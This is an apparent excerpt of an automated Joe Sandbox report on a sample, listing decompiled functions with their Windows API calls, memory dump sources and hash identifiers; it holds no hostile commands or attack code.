                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00875502
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00875510
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00875518
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00875522
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087555E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 6281a944d345e7d50bf23df10617c067295cc9c638c3b82fdc44afe962c6fdec
                                                            • Instruction ID: 2bd3849549f49d9e74920522ea92f48afb44454102ff9a9b3515a9c5e9d6c366
                                                            • Opcode Fuzzy Hash: 6281a944d345e7d50bf23df10617c067295cc9c638c3b82fdc44afe962c6fdec
                                                            • Instruction Fuzzy Hash: BA015732C00A2DDBCF04EFE8E888AEDBB79FB09711F044156EA05F2145DB709650C7A1
                                                            Function 00867652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?,?,0086799D), ref: 0086766F
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 0086768A
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 00867698
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?), ref: 008676A8
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0086758C,80070057,?,?), ref: 008676B4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: cedef9b6b2acf3a2bbadfded653708e37a67570a61b713531de86949e97bee6f
                                                            • Instruction ID: abe2126bf237151650a9e61655430e8fe65bd09b602754f85ac6e4ef8cef250d
                                                            • Opcode Fuzzy Hash: cedef9b6b2acf3a2bbadfded653708e37a67570a61b713531de86949e97bee6f
                                                            • Instruction Fuzzy Hash: F701D472600604BBDB105F18DC08BAA7BADFB48B55F150139FE05D2212E771DD5097E0
                                                            Function 008685F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00868608
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00868612
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00868621
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00868628
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0086863E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 9029e87ccef6a652cfa50ae38c868aaae394a314d4a215c20e87d65eebd8d740
                                                            • Instruction ID: 78cb921fb660d58557349426edbd8045a17b6f945c59545aaa9d5a1446e5ac79
                                                            • Opcode Fuzzy Hash: 9029e87ccef6a652cfa50ae38c868aaae394a314d4a215c20e87d65eebd8d740
                                                            • Instruction Fuzzy Hash: E6F04F31241204EFEB151FA5DC8DE6F3BACFF89754B144626FA49C6161CB619C41DA60
                                                            Function 00868652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00868669
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00868673
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00868682
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00868689
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0086869F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: b339f45726223d4a6eda0bd3c29a69e58f019c63321b694b75799ed93c9041a6
                                                            • Instruction ID: 4db492006f33b0b4f6d0595056e37b0f6acbdbef99b3292f3ab0569ecf2a87c9
                                                            • Opcode Fuzzy Hash: b339f45726223d4a6eda0bd3c29a69e58f019c63321b694b75799ed93c9041a6
                                                            • Instruction Fuzzy Hash: 91F04F71200204EFEB152FA5EC8DE6B3BACFF89758B140126FA49C6151CB619941DB60
                                                            Function 0086C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0086C6BA
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0086C6D1
                                                            • MessageBeep.USER32(00000000), ref: 0086C6E9
                                                            • KillTimer.USER32(?,0000040A), ref: 0086C705
                                                            • EndDialog.USER32(?,00000001), ref: 0086C71F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 952fa26a61fc37d3669feb7ad8920611e87ca5b747346be507009bfb5d41c51c
                                                            • Instruction ID: b901ff510e2db07f6d2b7111360c0fe6c9d796a7ec55f435f2f15b56195e88f9
                                                            • Opcode Fuzzy Hash: 952fa26a61fc37d3669feb7ad8920611e87ca5b747346be507009bfb5d41c51c
                                                            • Instruction Fuzzy Hash: 6A018670500708ABEB256B64ED4EFA677B8FF10705F08066EF696E14E1DBF4A9548F80
                                                            Function 008113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 008113BF
                                                            • StrokeAndFillPath.GDI32(?,?,0084BAD8,00000000,?), ref: 008113DB
                                                            • SelectObject.GDI32(?,00000000), ref: 008113EE
                                                            • DeleteObject.GDI32 ref: 00811401
                                                            • StrokePath.GDI32(?), ref: 0081141C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 335cd93722432604f88646a810936604ce6ac31e98acb2e960053cd0ba014fad
                                                            • Instruction ID: e7874c12462daf5cb5c0655c97986e88a1dd78c4d3a4a5c7aa3dd35c3c67c2eb
                                                            • Opcode Fuzzy Hash: 335cd93722432604f88646a810936604ce6ac31e98acb2e960053cd0ba014fad
                                                            • Instruction Fuzzy Hash: BDF0F63000160CEBDB156F66EC0C7983BA9FB00326F088336E629840B2E73549A5EF50
                                                            Function 0087C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0087C69D
                                                            • CoCreateInstance.OLE32(008A2D6C,00000000,00000001,008A2BDC,?), ref: 0087C6B5
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • CoUninitialize.OLE32 ref: 0087C922
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 4612fb4a45c4917e1fe71e9318db760384a1742c85d9d716cc992540f100e461
                                                            • Instruction ID: 6398e56f04cbce81d23f881c64f73634fbda305225a851a65c112d5b285f3a8d
                                                            • Opcode Fuzzy Hash: 4612fb4a45c4917e1fe71e9318db760384a1742c85d9d716cc992540f100e461
                                                            • Instruction Fuzzy Hash: 65A10971108205AFD700EF58C891EABB7ACFF98704F04491DF196D72A2DB70EA49CB52
                                                            Function 00822E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 00817BB1: _memmove.LIBCMT ref: 00817C0B
                                                            • __swprintf.LIBCMT ref: 0082302D
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00822EC6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 00c7c40d55330d7c2420e7cbb705183b66408e9c2926ade6cdb45153a305ee63
                                                            • Instruction ID: c0b243be3aaa105fd0d6bf18c671a643f7210109e6d1e57bbde9a9e7ba7a2fe5
                                                            • Opcode Fuzzy Hash: 00c7c40d55330d7c2420e7cbb705183b66408e9c2926ade6cdb45153a305ee63
                                                            • Instruction Fuzzy Hash: EA915E715086119FC718EF28D895C6EB7B8FF85750F40491DF885D72A1EB24EE88CB62
                                                            Function 0087BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008148A1,?,?,008137C0,?), ref: 008148CE
                                                            • CoInitialize.OLE32(00000000), ref: 0087BC26
                                                            • CoCreateInstance.OLE32(008A2D6C,00000000,00000001,008A2BDC,?), ref: 0087BC3F
                                                            • CoUninitialize.OLE32 ref: 0087BC5C
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: dcb13fc67758164ce97b23f67060660d829884dd393d51ff9199c59884095923
                                                            • Instruction ID: 516df21be939655e507f460f4cb5f7337e8439899db9f910b6f0e782d9c6c003
                                                            • Opcode Fuzzy Hash: dcb13fc67758164ce97b23f67060660d829884dd393d51ff9199c59884095923
                                                            • Instruction Fuzzy Hash: 2FA133756042019FCB10DF18C494E9ABBEAFF89314F148998F899DB3A1CB31ED45CB92
                                                            Function 0083524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 008352DD
                                                              • Part of subcall function 00840340: __87except.LIBCMT ref: 0084037B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: b94bd7f0400fb529f7c1028d4afd682c3b6337f7aa3f1fa2db361983a6416747
                                                            • Instruction ID: 0a9d50beade7d8c3d9ceec04d60f0a07169ac8362289a479aef5b4d68975a665
                                                            • Opcode Fuzzy Hash: b94bd7f0400fb529f7c1028d4afd682c3b6337f7aa3f1fa2db361983a6416747
                                                            • Instruction Fuzzy Hash: 44517931A0DA0987D7107B28C91136B2B90FB81754F208D59E6C5C27EAEF748DC49ECA
                                                            Function 0083023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$+
                                                            • API String ID: 0-2552117581
                                                            • Opcode ID: ce484e1ea3686c9c7546f7802bfc90246f666a20b3ad99c1d79e48be6e101022
                                                            • Instruction ID: 7703fabb4e2000c21456b3ebea4964835ad78f8cd7f821631b24fb0f0a3561e4
                                                            • Opcode Fuzzy Hash: ce484e1ea3686c9c7546f7802bfc90246f666a20b3ad99c1d79e48be6e101022
                                                            • Instruction Fuzzy Hash: 7C51217510524ACFCF169F28C498AFA7BA4FF55310F184065F891DB2E0D7309C82CBA1
                                                            Function 008262F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: bdcc29f6664520a80bcffe0195469ab7d51ffcf556577557651613cf308d72d9
                                                            • Instruction ID: 098c61aae8b223b3a4d68da2d00ad45fc09e02afe2428174dd3254ae92bba37c
                                                            • Opcode Fuzzy Hash: bdcc29f6664520a80bcffe0195469ab7d51ffcf556577557651613cf308d72d9
                                                            • Instruction Fuzzy Hash: 2F51BE719007199BCB24DF65D885BAABBF4FF04314F20856EE68ACA241F770D694CB84
                                                            Function 00897BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0089F910,00000000,?,?,?,?), ref: 00897C4E
                                                            • GetWindowLongW.USER32 ref: 00897C6B
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00897C7B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 762165dd213480038548514cc3bccf372aad79180efcf8d1e528337cc8277fbc
                                                            • Instruction ID: c226c9508e0ab4e23ace09628697dc5b7d33086e92e8535fd94fc810be4d012f
                                                            • Opcode Fuzzy Hash: 762165dd213480038548514cc3bccf372aad79180efcf8d1e528337cc8277fbc
                                                            • Instruction Fuzzy Hash: 8631AE31214209ABDF15AF38DC45BEA77A9FF45328F284725F975E22E0D731E8509B50
                                                            Function 00897648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008976D0
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008976E4
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00897708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 6d8a8e24d83194fd076b56bda2d4b963919f6bfeb72e75253edc5736105f0894
                                                            • Instruction ID: 0dccaac1263eafcc21f0baa74494dcbd49c6f7067bae61c65eb6af65e0a17381
                                                            • Opcode Fuzzy Hash: 6d8a8e24d83194fd076b56bda2d4b963919f6bfeb72e75253edc5736105f0894
                                                            • Instruction Fuzzy Hash: 8121BF32610218BBDF169EA4CC46FEA3B69FF58714F150214FE15AB1D0D6B1A8508BA0
                                                            Function 00896F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00896FAA
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00896FBA
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00896FDF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 700b0ca1989badf6c02d61f58929c9df3117261792e0a498e3d6f6cb338d90dd
                                                            • Instruction ID: dbb8066acf4d84d0a7477f9971cd211de3d11e2ea22d85f28189be19380003e1
                                                            • Opcode Fuzzy Hash: 700b0ca1989badf6c02d61f58929c9df3117261792e0a498e3d6f6cb338d90dd
                                                            • Instruction Fuzzy Hash: 2121B032610118BFDF11AF54EC85EAB37AAFF89754F058124FA14DB190DA71AC618BA0
                                                            Function 0089797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008979E1
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008979F6
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00897A03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
